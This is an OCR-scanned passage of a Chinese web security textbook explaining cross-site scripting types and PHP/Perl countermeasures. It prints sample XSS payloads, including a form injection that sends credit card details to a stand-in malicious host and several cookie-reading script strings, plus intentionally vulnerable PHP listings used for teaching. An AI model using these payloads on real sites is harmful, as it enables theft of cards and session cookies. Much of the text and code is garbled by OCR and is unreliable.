姓 名 <INPUT size="20" name="name" value=""></form> [通过 指定 样式 将 原先 的 form 覆盖 


<form Style=top So loEC Slon DS ol te > nde Dackground ool whte 





[ 厂 一 一 一 一 一 自 改 action 目标 至 恶意 网 站 
action=http://trap.example.com/43/43-903.php method=POST> 请 使 用 信用 卡 支付 预购 定金 
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<br> 姓 名 <input size=20 name=name><br> 地 址 <input size=20 name=addr><br> 














电话 号 码 <input size=20 name=tel><br> 型 号 <input size=10 name=kind> 数 量 














<input size=5 name=num><br> 信用 卡号 <input size=16 name=card> 有 效 期 限 <input size=5 




















name=thru><br><input value= 申请 type=submit><br><br><br><br><br> 


</form>"><BR> 





恶意 网 页 通过 下 列 手段 隐藏 原先 的 form 并 添加 新 的 form， 从 而 改变 页 面 。 


使 用 </form> 使 原先 页 面 的 form 元 素 结束 

添加 新 的 form 元 素 ， 并 指定 style 如 下 
通过 指定 绝对 座 标 将 form 的 位 置 定位 于 左上 角 
将 z-index 设置 为 很 大 的 值 (99),， 确保 其 堆 革 顺序 在 原先 form 的 前 面 
将 背景 色 设 为 白色 ， 从 而 隐藏 原先 的 form 

将 action 的 URL 指定 为 恶意 网 站 


被 更 改 后 的 页 面 如 下 图 所 示 。 
4-17 ”被 更 改 后 的 手机 预购 网 站 

















汪 四 
看 全 新 手机 预约 - Windows Internet Explorer 己 | 回 | 有 
G Oe= | 回 httpi//examplejp/43/43-002.php ~ [IX||sng P27 

| BWA |: IAO)~ 








被 更 改 的 地 方 








数量 
有 效 期 限 























页 面 上 被 添加 了 “请 使 用 信用 卡 支 付 预购 定金 ”和 输入 信用 卡 卡号 及 有 效 期 限 的 文本 杠 。 此 
外 ， 尽 管 页 面 上 看 不 出 来 ， 但 form 元 素 的 action 属性 也 已 经 被 变 成 了 恶意 网 站 的 URL。 

然而 ， 浏 览 需 地 址 栏 上 显示 的 URL 却 同 先前 的 手机 预购 网 站 完全 一 致 。 此 外 ， 虽 然 本 例 没 
有 涉及 ， 但 事实 上 当 网 站 为 https 时 其 证 书 也 会 被 显示 为 正规 。 因 此 ， 用 户 便 找 不 到 任何 蛛 丝 马 
迹 来 识破 这 一 伪装 的 页 面 。 

由 此 可 见 ，XSS 并 非 一 定 会 使 用 JavaScript， 因 此 ， 如 果 防 范 策略 仅 局 限于 script 元 素 ( 例 
如 将 “script” 单 词 全 部 删除 )， 攻 击 者 还 是 会 有 可 乘 之 机 。 而 对 用 户 来 说 ， 仅 在 浏览 器 中 禁止 
JavaScript 也 是 不 能 得 以 高 枕 无 忧 的 。 























令 反 射 型 XSS 与 存储 型 XSS 

接 下 来 我 们 将 换个 视角 ， 根 据 攻击 用 JavaScript 代码 的 存储 地 点 将 XSS 攻击 分 类 。 

如 果 攻 击 用 JavaScript 代码 位 于 攻击 目标 网 站 之 外 的 其 他 网 站 (恶意 网 站 或 邮件 中 的 URL )， 
就 称 之 为 反射 型 XSS ( Reflected XSS )。 最 先 介绍 的 43-001.php 中 的 XSS 攻击 模式 ， 就 属于 反射 
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型 XSS。 反 射 型 XSS 多 发 生 于 网 页 将 用 户 的 输入 值 原封 不 动 地 显示 出 来 的 情况 下 。 其 中 ,输入 
值 确认 页 面 就 是 一 个 典型 的 例子 。 


4-18 反射 型 XSS 





恶意 网 站 攻击 者 
(Dh 设置 圈套 























利用 脚本 进行 攻击 








人 @) 跳 转 至 攻击 对 象 服务 器 
( JavaScript 作为 参数 包含 其 中 ) 


攻击 对 象 网 站 








@ 生 成 包含 JavaScript 的 网 页 





@)JavaScript 在 受害 者 


的 浏览 器 中 被 执行 





与 此 相对 ， 有 时 攻击 者 也 会 将 攻击 用 JavaScript 代码 保存 至 攻击 对 象 的 数据 库 中 。 这 种 模式 
的 XSS 就 被 称 为 存储 型 XSS ( Stored XSS ) 或 持久 性 XSS ( Presistent XSS )。 


4-19 存储 型 XSS 


攻击 者 





中 向 Web 邮箱 客户 端 等 发 布 


eo。 攻击 对 象 网 站 








Q@ 浏览 攻击 对 象 网 站 


























8 


” 用 脚本 进行 攻击 
受害 者 


人 @@)JavaScript 在 受害 者 








的 浏览 器 中 被 执行 
存储 型 XSS 的 典型 攻击 对 象 为 Web 邮箱 客户 端 以 及 社交 网 站 ( Social Networking Service， 
简称 SNS )。 存 储 型 XSS 无 需 攻 击 者 费 尽 心思 将 用 户 引诱 至 恶意 网 站 ， 而 且 即 使 是 戒心 很 重 的 用 
户 也 会 有 很 大 的 几率 中 招 ， 因 此 对 攻击 者 来 说 益处 多 多 。 
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存储 型 XSS 产生 的 原因 同样 也 位 于 生成 HTML 的 地 方 。 
除 此 之 外 ， 当 网 页 中 存在 不 通过 服务 器 而 仅 依靠 前 端 JavaScript 来 显示 的 参数 时 ,就 有 可 能 
会 招致 DOM based XSS 这 种 类 型 的 XSS 发 生 。 详 情 将 在 4.3.2 节 介 绍 。 





安全 隐患 的 产生 原因 





XSS 漏洞 产生 的 原因 为 ， 生 成 HTML 的 过 程 中 ，HTML 语法 中 含有 特殊 意义 的 字符 (元 字 





符 ) 没有 被 正确 处 理 ， 结 果 导 致 HTML 或 JavaScript 被 届 
产生 变化 。 为 了 消除 元 字符 的 特殊 意义 ， 将 其 转化 为 普通 字符 ， 就 需要 用 到 转 义 ( Escape ) 处 理 。 





HTML 的 转 义 处 理 对 于 消除 XSS 至 关 重 要 。 
接 下 来 就 让 我 们 来 看 一 下 HTML 中 转 义 的 方法 ， 以 及 不 转 义 时 将 会 遭受 的 攻击 。 





令 HTML 转 义 的 概要 


这 里 我 们 来 重点 看 一 下 如 何 正 确 地 进行 HTML 转 义 。 











例如 ， 在 HTML 中 显示 < 时， 必须 按照 字符 实体 引 月 











LE 意 注入 ， 从 而 使 得 原先 的 HTML 结构 


























日 ( Character Entity Reference ) 将 其 转 


义 记载 为 &lt;。 而 如 果 忽 略 这 一 步 又 直接 生成 HTML 的 话 ， 浏 览 咒 就 会 将 < 解释 为 标签 的 开始 。 
从 而 就 会 招致 恶意 利用 此 漏洞 进行 的 XSS 攻击 。 
在 HTML 中 ,根据 字符 所 处 位 置 的 不 同 ， 应 当 转 义 的 元 字符 也 会 发 生变 化 。 基 本 篇 将 对 图 





4-20 中 的 元 素 内 容 和 属性 值 的 转 义 方法 进行 介绍 。 





4-20 元素 内 容 和 属性 值 的 说 明 





<html> 

<body> 

fOrm 二 

<input name="tel" value="03-1234-5678"> 
<input type="submit"> 
</form> 

<p> 

元 素 内 容 

</p> 

</form> 

</html> 








属性 值 








下 表 归 纳 了 不 同位 置 的 参数 的 转 义 方法 。 


表 4-4 参数 所 在 位 置 及 相应 的 转 义 方法 
























































位 置 说 明 最 低 限度 的 转 义 内 容 
二 。 能 解释 Ta g 和 字符 实体 人 
元 素 内 容 。 结束 边界 字符 为 “< <” 和 “&” 使 用 字符 实体 转 义 
属性 值 ( 双 引 号 中 |。 能 解释 字符 实体 属性 值 用 双 引 号 括 起 来 ,，“<” 和 “&” 和 
的 内 容 ) 。 结束 边界 字符 为 双 引号 “" ”使 用 字符 实体 转 义 
































@D 尽管 要 求 将 属性 值 中 的 < 转 义 的 是 XHTML， 但 HTML4.01 的 情况 下 也 可 以 进行 转 义 。 
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接 下 来 就 让 我 们 来 探讨 一 下 不 进行 转 义 时 将 会 受到 怎样 的 XSS 攻击 。 


令 元 素 内 容 的 XSS 

关于 元 素 内 容 (通常 为 文本 格式 ) 中 发 生 的 XSS， 之 前 在 介绍 “通过 XSS 窃取 Cookie 值 ” 
时 已 经 做 过 讲述 。 元 素 内 容 中 发 生 的 XSS 是 最 基本 的 攻击 模式 ， 经 常 发 生 于 没有 将 < 转 义 的 情 
况 下 。 


令 没 有 用 引号 括 起 来 的 属性 值 的 XSS 
如 下 脚本 中 的 属性 值 没 有 用 引号 括 起 来 。 


代码 清单 ”/43/43-003.php 























<body> 
<input type=text name=mail value=<?php echo $ GET['p']; ?>> 
</body> 





此 时 ,假设 p 的 值 如 下 。 








lt+onmouseover%3dalert (document .cookie) 








URL 中 的 + 代表 空格 ，%3G 代表 等 号 = ( 百 分 号 编码 )。 因 此 ， 之 前 的 input 元 素 就 变 成 了 如 
下 这 般 。 





<input type=text name=mail value=1 onmouseover= 





alert (document .cookie)> 








属性 值 没 有 用 引号 括 起 来 时 ， 空 格 就 意味 着 属性 值 的 结束 ， 因 此 就 可 以 通过 插入 空格 来 添加 
属性 。 此 处 即 被 添加 了 onmouseover 事件 绑 定 。 

如 下 图 所 示 ， 将 鼠标 移 到 input 元 素 的 文本 输入 框 上 时 ，JavaScript 就 会 被 执行 。 

图 4-21 XSS 攻击 成 功 


感 http://example.jp/43/43-003.php?p=1+onmouseov.… [ele| ¥ | 

















© 《Ko 加 http://example.jp/43/43-003.php?p=1+onmc v| 条 | 汉 | 


Windows Internet Explorer 











PHPSESSID=r882i61dpigShog9lghc282kdo 














令 用 引号 括 起 来 的 属性 值 的 XSS 
然而 ， 即 使 属性 值 都 用 引号 括 了 起 来 ,但 只 要 " 没有 被 转 义 ， 还 是 会 发 生 XSS 攻击 。 比 如 ， 
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如 下 脚本 中 属性 值 就 用 引号 括 了 起 来 。 


代码 清单 “/43/43-004.php 








<body> 
<input type="text" name="mail" value="<?php echo $ GET['p']; ?>"> 
</body> 





此 时 ,假设 p 的 值 如 下 。 





"+onmouseovergs3d"alert (document .cookie) 





之 前 的 input 元 素 就 变 成 了 如 下 这 般 。 





<input type="text" name="mail" value="" onmouseover="alert (document .cookie)"> 











value="" 使 得 value 属性 结束 ，onmouseover 以 后 的 字符 被 解释 为 事件 绑 定 。 因 此 ， 结 
同 前 项 相同 。 











对 策 

至 此 我 们 已 经 了 解 到 XSS 漏洞 产生 的 主要 原因 是 生成 HTML 时 没有 对 < 和 " 转 义 。 因 此 ， 
将 特殊 字符 转 义 显然 就 是 重要 对 策 ， 但 就 像 上 文中 介绍 的 那样 ， 依 据 字 符 在 HTML 中 的 位 置 不 
同 ， 转 义 方针 也 各 不 相同 。 

但 是 ， 分 类 太 细 反而 又 会 使 编程 复杂 化 ， 因 此 ， 下 面 我 们 将 介绍 一 些 共通 性 较 强 的 对 策 。 





























令 XSS 对 策 的 基础 
在 一 般 的 HTML (JavaScript 和 CSS 除外 ) 中 ， 使 用 字符 实体 进行 转 义 是 XSS 对 策 的 基础 。 
正如 上 文 “ 安 全 隐患 的 产生 原因 ”中 所 写 的 那样 ，HTML 中 最 低 限 度 的 防范 策略 如 下 2。 


元 素 内 容 中 转 义 < 和 &? 
属性 值 用 双 引 号 括 起 来 ， 并 转 义 < 和 "和 广 

使 用 PHP 开发 应 用 时 ， 可 以 使 用 htmlspecialchars 限 数 进行 HTML 的 转 义 。 
htmlspecialchars 最 多 可 接收 4 个 参数 ， 其 中 ， 与 安全 性 相关 的 前 3 个 参数 尤其 重要 。 














格式 清单 ”htmlspecialchars 函数 


Stng nemlipecnalhar (Sting me ne utens ty le tm ena es 


四 XHTML 的 属性 值 < 也 是 转 义 对 象 。 
@ script 和 style 元 素 除外 。script 元 素 内 转 义 将 在 下 一 部 分 内 容 (4.3.2 ) 中 讲述 。 








4.3 ”页面 显示 的 相关 问题 | 87 

















各 参数 的 意义 详 见 下 表 。 


表 4-5 htmlspecialchars 函数 的 参数 





























参数 说 明 
$string 转换 对 象 字 符 串 
$quote style 引号 的 转换 方法 ， 参 考 表 4-6 
scharset 字符 编码 。 如 UTF-8、GBK 





使 用 示例 








echo htmlspecialchars ($p, ENT QUOTES, "UTF-8"); 








表 4-6 htmlspecialchars 函数 中 的 转换 对 象 字 符 























ee a $quote_style 以 及 转换 对 象 字 符 
ENT_NOQUOTES ENT_COMPAT ENT_QUOTES 
< &lt; O O O 
3 &gt; O O © 
& &amp O O O 
" &quot; x O 加 
&#39; x x O 




















而 实际 编程 中 我 们 只 要 采取 如 下 方针 即 可 。 
转 义 元 素 内 容 时 $Squote_style 可 设 为 任意 值 
属性 值 按照 以 下 两 个 方针 处 理 
属性 值 用 双 引 号 括 起 来 
将 Squote style 设 为 ENT COMPAT 或 ENT QUOTES 




















CO htmlspecialchars 函数 的 第 三 个 参数 

htmlspecialchars 函数 的 第 三 个 参数 是 指定 字符 编码 。PHP 脚本 的 情况 下 ， 输 入 /内 部 
/输出 可 以 分 别 指定 不 同 的 字符 编码 ,但 htmlspecialchars 函数 中 指定 的 字符 编码 需 与 PHP 
的 内 部 字符 编码 一 致 。 如 果 指 定 有 误 的 话 函 数 的 处 理 就 会 不 正常 ， 所 以 务必 要 正确 指定 。 








令 指定 响应 的 字符 编码 
如 果 Web 应 用 与 浏览 絮 各 自 设 想 的 字符 编码 不 一 致 ， 也 会 成 为 XSS 的 原因 。PHP 中 提供 了 
多 种 指定 字符 编码 的 方法 ， 其 中 最 可 靠 的 方法 是 采用 header 函数 ， 如 下 所 示 。 











header ('Content-Type: text/html; charset=UTF-8'); 
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关于 字符 编码 的 详细 内 容 请 参考 第 6 章 。 


令 XSS 的 辅助 性 对 策 

此 处 介绍 一 些 能 够 缓和 XSS 攻击 的 对 策 。 虽 然 上 文 已 经 介绍 了 XSS 攻击 的 根本 性 对 策 , 但 
是 ， 由 于 需要 提防 的 地 方 实在 太 多 ， 而且 依据 HTML 中 位 置 的 不 同 ， 防 范 策略 也 各 异 ， 因 此 很 
容易 有 所 玻 漏 。 而 通过 实施 下 面 介绍 的 辅助 性 对 策 ， 即 使 根本 性 对 策 的 实施 有 所 玻 漏 ， 也 能 减轻 
攻击 造成 的 损害 。 

















仿 输 入 校 验 

就 像 4.2 节 中 介绍 的 那样 ， 通 过 检验 输入 值 的 有 效 性 ， 当 输入 值 不 符合 条 件 时 就 显示 错误 消 
息 并 促使 用 户 重 新 输入 ， 有 时 也 能 够 防御 XSS 攻击 。 

当 且 仅 当 输入 值 为 字母 或 数字 的 情况 下 ， 输 入 校 验 才能 预防 XSS 攻击 ， 如 果 输 入 框 允 许 所 
有 的 字符 就 无 法 防御 XSS 攻击 了 。 

















仿 给 Cookie 添加 HttpOnly 属性 

Cookie 中 有 名 为 HttpOnly 的 属性 ， 该 属性 能 禁止 JavaScript 读 取 Cookie 值 。 
通过 给 Cookie 添加 HttpOnly 属性 ， 能 够 杜绝 XSS 中 和 窍 取 会 话 ID 这 一 典型 的 攻击 手段 。 但 
需 注 意 的 是 其 他 攻击 手段 依然 有 效 ， 所 以 这 样 只 是 限制 了 攻击 者 的 选择 范围 ， 并 不 能 杜绝 所 有 
XSS 攻击 。 

使 用 PHP 开发 应 用 时 ， 给 会 话 ID 添加 HttpOnly 属性 ， 可 以 在 php.ini 中 做 如 下 设置 。 










































































session.cookie httponly = On 





详情 请 参考 PHP 的 说 明文 档 。 


今 关 闭 TRACE 方法 

这 是 跨 站 追踪 ( Cross-Site Tracing， 简 称 XST ) 攻击 的 防范 策略 。XST 是 指 利用 JavaScript 
发 送 HTTP 的 TRACE 方法 来 窃取 Cookie 值 或 Basic 认证 密码 的 攻击 手段 。 

XST 攻击 利用 的 是 XSS 漏洞 ， 所 以 只 要 消除 了 XSS 漏洞 就 能 保证 安全 无 贷 。 而 为 了 以 防 实 
施 防 范 策略 时 有 所 遗漏 ， 可 以 通过 关闭 TRACE 方法 来 防御 XST 攻击 。 实 际 上 ， 现 在 的 主流 浏 
览 器 都 已 经 能 够 自己 防御 XST， 所 以 只 要 用 户 不 使 用 一 些 另 类 的 浏览 器 ， 就 可 以 不 用 顾虑 XST 
攻击 。 

在 Apache 中 ,关闭 TRTACE 方法 ， 可 以 在 httpd.conf 中 做 如 下 设置 。 


























TraceEnable Off 




















4.3 ”页面 显示 的 相关 问题 | 89 

















对策 总 结 
根本 性 对 策 ( 个 别 对 策 ) 
HTML 的 元 素 内 容 
使 用 htmlspecialchars 困 数 转 义 
属性 值 
使 用 htmlspecialchars 国 数 转 义 并 用 双 引 号 括 起 来 
根本 性 对 策 ( 共通 对 策 ) 
明确 设置 HTTP 响应 的 字符 编码 
辅助 对 策 
给 Cookie 添加 HttpOnly 属性 
关闭 TRACE 方法 
































T 
orl 


参考 : 使 用 Perl 的 对 策 示例 
接 下 来 向 大 家 介绍 一 下 Perl 中 能 够 用 来 防范 XSS 的 功能 。 


令 使 用 Perl 进行 HTML 转 义 的 方法 
在 Perl 中 转 义 HTML 时 ， 能 够 使 用 CGLpm 中 的 escapeHTML 方法 。 





# 声明 使 用 CGI.pm 与 escapeHTML 

use CGI qdqw(escapeHTML) ; 

my Squery = new CGI; # 生成 CGI 对 象 
# ... 
my $ep = escapeHTML($p); # 将 $p 进行 HTML 转 义 后 赋值 给 $ep 
































令 指 定 响 应 的 字符 编码 
在 程序 的 开头 加 上 如 下 代码 ， 就 可 以 指定 HTTP 响应 的 字符 编码 。 
































# 在 程序 的 开头 处 

use CGI; 

my Squery = new CGI; # 生成 CGI 对 象 

# 输出 响应 之 前 

print S$dquery->heaqer (-Ccharset => 'UTF-8'); 
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4.3.2 ” 跨 站 脚本 ( 进 阶 篇 ) 


本 节 作为 前 一 节 的 补充 ， 将 继续 介绍 其 他 形式 的 跨 站 脚本 安全 隐患 ， 即 href 等 保存 URL 的 
属性 值 、 事 件 绑 定 函数 以 及 script 元 素 。 

前 面 已 经 提 到 过 转 义 参数 的 方法 根据 其 在 HTML 中 的 位 置 不 同 而 不 同 ， 因 此 ， 这 里 我 们 将 
上 一 节 的 图 4-20 扩充 ， 如 图 4-22 所 示 。 

















4-22 HTML 的 组 成 元 素 















































脚本 ( 事件 绑 定 ) 
事件 绑 定 函数 中 的 
| TO 
<html> 
<body onloagd="jnit (ee) "> 
EO cy 


<input name="tel" value="03-1234-5678"> 
<input type="submit"> 











</form> 属性 值 
<a href="http://example.jp/"> XXXX </a> 
<p> 
元 素 内 容 属性 值 URL ) 
</p> 
<script type="test/javascript"> 

Ee De Es 

document .write('John'); 4 脚本 
</script> 
</form> script 元 素 中 的 
</html> 了 体 中 了 由 



































与 上 图 相对 应 ， 下 表 为 扩充 后 的 HTML 转 义 概要 。 


表 4-7 HTML 转 义 概要 























































































































































































































位 轩 说 明 转 义 概要 
和 已 外 和 又 ~ 符 实 E 结 边 8 

元 素 内 容 ( 普通 文本 ) ps 9 和 字符 实体 。 秆 来 边界 字 | 。_， 和 和 “g" 使 用 字符 实体 转 义 

i 能 解释 字符 实体 。 结 束 边 界 字 符 为 双 | 属性 信用 双 引号 括 起 来 ，"<” 和 “&"” 和 
引号 征用 字符 实体 转 义 

属性 值 URL ) a 检验 URL 格式 正确 后 按照 属性 值 的 规则 转 义 

事件 绑 定 函数 司 上 转 义 JavaScript 后 按照 属性 值 的 规则 转 义 
:能 解释 Tag 和 字符 实体 。 结 束 边 3 

script 元 素 中 的 字符 串 字 0 和 字符 实体 3 条 来 边界 转 义 JavaScript 并 避免 出 现 “</” 

其 中 ， 元 素 内 容 与 属性 值 已 在 上 一 节 讲 述 ， 接 下 来 我 们 来 看 一 下 其 他 三 项 。 
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href 属性 与 src 属性 的 XSS 

有 些 属 性 的 值 为 URL， 比 如 a 元 素 的 href 属性 、img 元 素 、frame 元 素 、iframe 元 素 的 src 
属性 等 。 如 果 属 性 中 URL 的 值 是 由 外 界 传 人 的话， 外 界 就 能 够 使 用 javascript:JavaScript 代码 形 
式 (javascript 协议 ) 的 URL 执行 JavaScript 代码 "。 比 如 ,下 面 这 段 示例 脚本 的 目的 就 是 使 用 外 界 
传人 的 URL 来 生成 链接 。 


代码 清单 ”/43/43-010.php 























<body> 
<a href="<?php echo htmlspecialchars ($ GET['url']); ?>"> 书 签 <-/a> 
</body> 





作为 攻击 示范 ， 下 面 我 们 使 用 以 下 URL 来 执行 这 段 脚本 。 





http://example.jp/43/43-010.php?url=javascript:alert (document .cookie) 











生成 的 HTML 如 下 。 如 你 所 见 ，href 属性 被 设置 了 JavaScript 协议 ， 从 而 便 能 够 执行 
JavaScript 代码 。 








<body> 





<a href="javascript:alert (document .cookie) "> 书签 </a> 
</body> 











在 页 面 上 点 击 “ 书 签 ” 链 接 后 ，JavaScript 就 会 被 执行 。 
图 4-23 XSS 攻击 成 功 


了 
苞 httpy/examplejp/43/43-010.php?url=javascriptalert(documentcookie) - in. 呈 | 回 | 严 
所 到 | 加 http://examplejp/43/43-010.php?url=javas 


cr | 工 Rol ~ 











*|elxlIBan  p 











帘 收 天 | httpy/examplejp/43/43-010.php?url=java 








A PHPSESSID=r882i61dpigsh0g9lghc282kd0 


























在 指定 URL 的 href 属性 与 src 属性 等 中 ， 有 时 javascript 协议 是 有 效 的 。 
javascript 协议 引发 的 XSS， 其 根源 不 是 没有 进行 HIML 转 义 ， 这 与 之 前 介绍 的 XSS 有 所 不 
同 ， 因此， 其 防范 对 策 也 不 尽 相 同 。 








中 除了 javascript 协议 ， 还 有 VBScript 协议 (vbscript': ) 
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令 生 成 URL 时 的 对 策 

当 URL 由 程序 动态 生成 时 ， 需 要 对 其 进行 校 验 ， 仅 允许 http 和 https 协议 。 此 外 ， 通 过 校 验 
的 URL 还 需要 作为 属性 值 进行 HTML 转 义 ?。 

具体 来 说 ，URL 需 满足 下 列 两 个 条 件 中 的 一 个 。 


以 http: 或 https: 开头 的 绝对 URL 
以 /开头 的 相对 URL 


以 下 为 能 够 实现 上 述 校 验 的 函数 示例 。 











function check url ($url) { 
if (preg match('/\Ahttp:/', $url) 
|| preg match('/\Ahttps:/', $url) 
|| preg match('#\A/#', $url)) { 
return true; 
} else { 
return false; 
} 
} 











传人 该 函数 的 字符 串 如 果 以 http:、https: 或 /开头 则 返回 trtue， 否 则 就 返回 false。 
令 校 验 链接 网 址 
如 果 外 界 能 够 任意 指定 链接 的 跳 转 去 向 ， 用 户 就 有 可 能 被 引 回 恶意 网 站 ， 从 而 被 攻击 者 通过 
钓鱼 式 攻击 方式 骗取 个 人 信息 。 因 此 ， 在 不 明确 跳 转 至 的 外 部 网 站 的 链接 时 ， 可 以 执行 如 下 任 一 
操作 。 
检查 链接 的 目标 URL， 如 果 指 向 外 部 网 站 就 报错 
当 链 接 目 标 为 外 部 URL 时 ， 显 示 一 个 警告 页 面 以 提醒 用 户 可 能 存在 风险 
关于 以 上 两 种 方法 的 详情 请 参考 4.7.1 节 。 


























_ JavaScript 的 动态 生成 
人 事件 绑 定 函 数 的 XSS 

在 当今 的 Web 应 用 中 ， 服 务 需 端 动 态 生成 一 部 分 JavaScript 的 情况 实 属 常见 。 其 中 ,一 个 典 
型 的 例子 就 是 动态 生成 JavaScript 中 的 字符 串 字 面 量 。 

比如 ， 下 面 的 PHP 脚本 中 ， 在 body 元 素 的 onload 事件 中 调用 函数 时 的 参数 就 是 由 服务 器 端 
动态 生成 的 ?。 






































@ 尽管 与 XSS 无 关 ， 生 成 URL 时 也 依然 需要 进行 百 分 号 编码 。 
@ 为 了 方便 读者 理解 ， 支 持 页 面 中 收录 的 代码 添加 了 在 页 面 上 显示 查询 字符 串 的 处 理 。 











4.3 ”页面 显示 的 相关 问题 | 93 

















代码 清单 ”/43/43-012.php 





<head><script> 
function init(a) {} // 空 函数 
</script></head> 


<body onload="init ('sephpieenomtmnlspee Lalenars(s em mame nl 
ENT QUOTES) ?3>')"> 
</body> 








这 里 使 用 htmlspecialchars 哺 数 进行 了 转 义 ， 因 此 貌似 很 妥善 ,但 其 实 这 段 PHP 脚本 
中 存在 XSS 漏洞 。 试 使 用 以 下 查询 文字 列 来 启动 脚本 。 





name=') ;alert (document .cookie)// 











启动 后 将 生成 如 下 HTML。 





<body onload="init('&#039;);alert (document .cookie)//')' 














由 于 onload 事件 绑 定 函数 本 质 上 是 HTML 中 的 属性 值 ， 能 解释 字符 实体 ， 因 此 ， 如 下 
JavaScript 代码 就 会 被 执行 。 





init('');alert (document .cookie)//') 














init 函数 的 参数 字符 串 字 面 量 被 迫 终 结 ， 后 面 被 添加 了 其 他 语句 。 这 时 ， 页 面 显示 如 
图 4-24。 


图 4-24 XSS 攻击 成 功 


F - 
辣 http://examplejp/43/43-012.php?name=');alert(document.cooki... en 





| 











OO-: [@ htpy/examplejp/43/43-012.pl | 分 | X GS Bing PP -> 
宙 收藏 夫 | 全 Httpy/examplejp/43/43-012.php?name=)… | 工具 (D) ~ 












你 好 来 和 网 页 的 消息 Lz 





全 PHpSESSID=r882i61dpigSh0g9lghc282kd0 















































此 处 之 所 以 会 混入 安全 隐患 ， 是 因为 没有 将 JavaScript 字符 串 字面 量 进 行 转 义 。 因 此 ， 输 入 
参数 中 的 单 引号 没有 被 识别 为 字符 ， 而 是 被 当成 了 JavaScript 中 字符 串 的 结束 符 。 
为 了 避免 这 种 情况 ， 理 论 上 应 采取 如 下 措施 。 
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1. 首先 ， 将 数据 作为 JavaScript 字符 串 字 面 量 进行 转 义 
2. 将 得 到 的 结果 再 次 进行 HTML 转 义 


下 表 为 JavaScript 字符 时 字面 量 中 必须 被 转 义 的 字符 。 


表 4.8 JavaScript 字符 串 字面 量 中 应 被 转 义 的 字符 

















字符 转 义 后 
\ \\ 
到 
换行 \n 











按照 上 述 规 则 ,假设 输入 值 为 <>'"\， 就 应 该 进行 如 下 转 义 。 


表 4.9 JavaScript 字符 串 字面 量 中 应 被 转 义 的 字符 








原 字符 JavaScript 转 义 后 HTML 转 义 后 
<>"'"N\ <SN NTNN &lt;&gt;\&H#39;\&quot;\\ 











而 JavaScript 更 为 实际 的 转 义 方法 在 后 面 介绍 “JavaScript 字符 趾 字 面 量 动态 生成 的 对 策 ” 
时 会 进行 讲述 。 

















令 script 元 素 的 XSS 

下 面 我 们 来 看 一 下 当 script 元 素 内 JavaScript 的 一 部 分 是 动态 生成 时 的 XSS 漏洞 。script 元 
素 中 不 能 解释 Tag 和 字符 实体 ， 所 以 无 需 进行 HTML 转 义 ， 只 要 进行 JavaScript 的 转 义 即 可 。 但 
是 ， 仅 此 还 不 够 。 比 如 下 面 的 这 段 脚 本 就 含有 安全 隐患 。 


代码 清单 ”/43/43-013.php 




















<?php 
function escape js($s) { 
return mb ereg replace(' ([\\\\\"])', '\\\1', $s); 
} 
Es 
<body> 


<script src="jquery-1.4.4.min.js"></script> 
你 好 ， <span id="name'"></span> 
HCELIDES 
$('#name') .text ('<?php echo escape js($ GET['name']); ?>'); 
</script> 
</body> 























通过 在 \、'、" 前 插入 \，escape js 隔 数 就 能 将 输入 值 作为 JavaScript 字符 串 字 面 量 进行 转 义 。 
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这 段 代 码 看 似 安全 无 虞 ,但 是 当 输 入 值 中 包含 </script> 时 ，</script> 就 会 被 当成 JavaScript 
代码 的 结束 符 (下 图 )。 





Beript> 
foo (' SYSernies' ) ; 





=e 








这 段 代 码 中 有 两 处 </script>, script 元 素 会 在 过 到 第 一 个 </script> 时 结束 。script 元 素 
不 考虑 上 下 文 ， 只 要 看 到 </script> 就 会 立刻 终结 ( 图 4-25 )。 


图 4-25 浏览 器 识别 JavaScript 





<script> @@@@g@g@g@@@@<-/script> 


浏览 器 不 会 考虑 JavaScript 的 语法 ， 
仅 负责 将 <script> 和 </script> 中 间 
的 部 分 传送 给 JavaScript 引擎 处 理 。 




















这 时 ， 攻 击 者 就 可 以 恶意 利用 这 一 特性 ， 并 输入 以 下 值 来 实施 XSS 攻击 。 








</script><script>alert (document .cookie)// 








页 面 显 示 如 下 。 


4-26 XSS 攻击 成 功 


Fr | 
外 http://examplejp/43/43-013.php?name=</script> <script>alert(document.co.. | 局 [ea| ¥ 








GO © | 回 htpy/examplejp/43/43-013.phpzname=</ * [$+| Xx ||®) sn Pr- 
帘 届 天 |© httpy/examplejp/43/43-013.php?name=</s.. | 工具 (oO) ~ 


你 好 来 自 网 页 的 沙 息 Lz] 

















外 PHPSESSID=r882i61dpigsh0g9lghc282kd0 
































根据 HTML 的 规格 ，script 元 素 中 的 数据 不 能 出 现 </。 而 字符 实体 因 不 能 被 解释 也 不 能 使 


用 。 所 以 ， 必 须 通过 变更 生成 的 JavaScript 代码 来 避免 这 些 问 题 。 以 下 就 是 具体 的 对 策 。 

















令 JavaScript 字符 串 字 面 量 动态 生成 的 对 策 

综 上 所 述 ， 动 态 生成 JavaScript 字符 串 字 面 量 时 需要 遵循 以 下 规则 。 

(1 ) 按照 JavaScript 语法 , 将 引号 ( 单 引 号 及 双 引 号 ) 和 和 斜 杠 \ 及 换行 符 等 进行 转 义 。" 一" 
' 王 V\ 换行 符 一 \n\ 一 \(2-1) 如 果 是 事件 绑 定 函 数 ， 将 (1) 的 执行 结果 按照 字符 实体 进行 HTML 
转 义 ， 并 用 双 引 号 括 起 来 ( 2-2 ) 如 果 是 在 script 元 素 中 ， 执 行 (1 ) 后 确保 字符 串 中 不 存在 </。 
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虽然 理论 上 如 此 , 但 JavaScript 的 转 义 规则 相当 复杂 ， 执 行 起 来 很 容易 产生 玻 漏 ， 因 此 一 直 
以 来 都 是 安全 隐患 诞生 的 温床 。 鉴 于 这 种 情况 ， 最 好 的 办 法 可 能 就 是 避免 动态 生成 JavaScript。 
然而 ， 现 实 中 又 会 经 常 需要 传 给 JavaScript 的 参数 是 动态 的 ， 因 此 ， 接 下 来 就 向 大 家 介绍 一 下 这 
种 情况 下 可 以 采取 的 两 类 处 理 方法 。 

















OO Unicode 转 义 
为 了 规避 动态 生成 JavaScript 带 来 的 风险 ， 可 以 采取 将 字母 和 数字 以 外 的 所 有 字符 都 进行 转 义 
的 方法 。 这 种 方法 利用 了 JavaScript 能 将 Unicode 代码 点 U+XXXX 字符 转 义 为 \uXXXX 的 功能 。 
下 面 就 是 实施 Unicode 转 义 的 escape js_string 函数 的 例子 。 前 提 是 字符 编码 为 UTF-8。 
escape_js_stting 中 ,除了 字母 和 数字 以 外 ,， 减 号 ( - ) 和 点 号 (. ) 也 不 进行 转 义 。 因 此 
像 -1.37 这 样 的 数值 就 不 会 被 转 义 。 不 转 义 减 号 和 点 号 对 安全 性 不 会 有 影响 。 














代码 清单 ”/43/escape_js_string.php 





<?php 
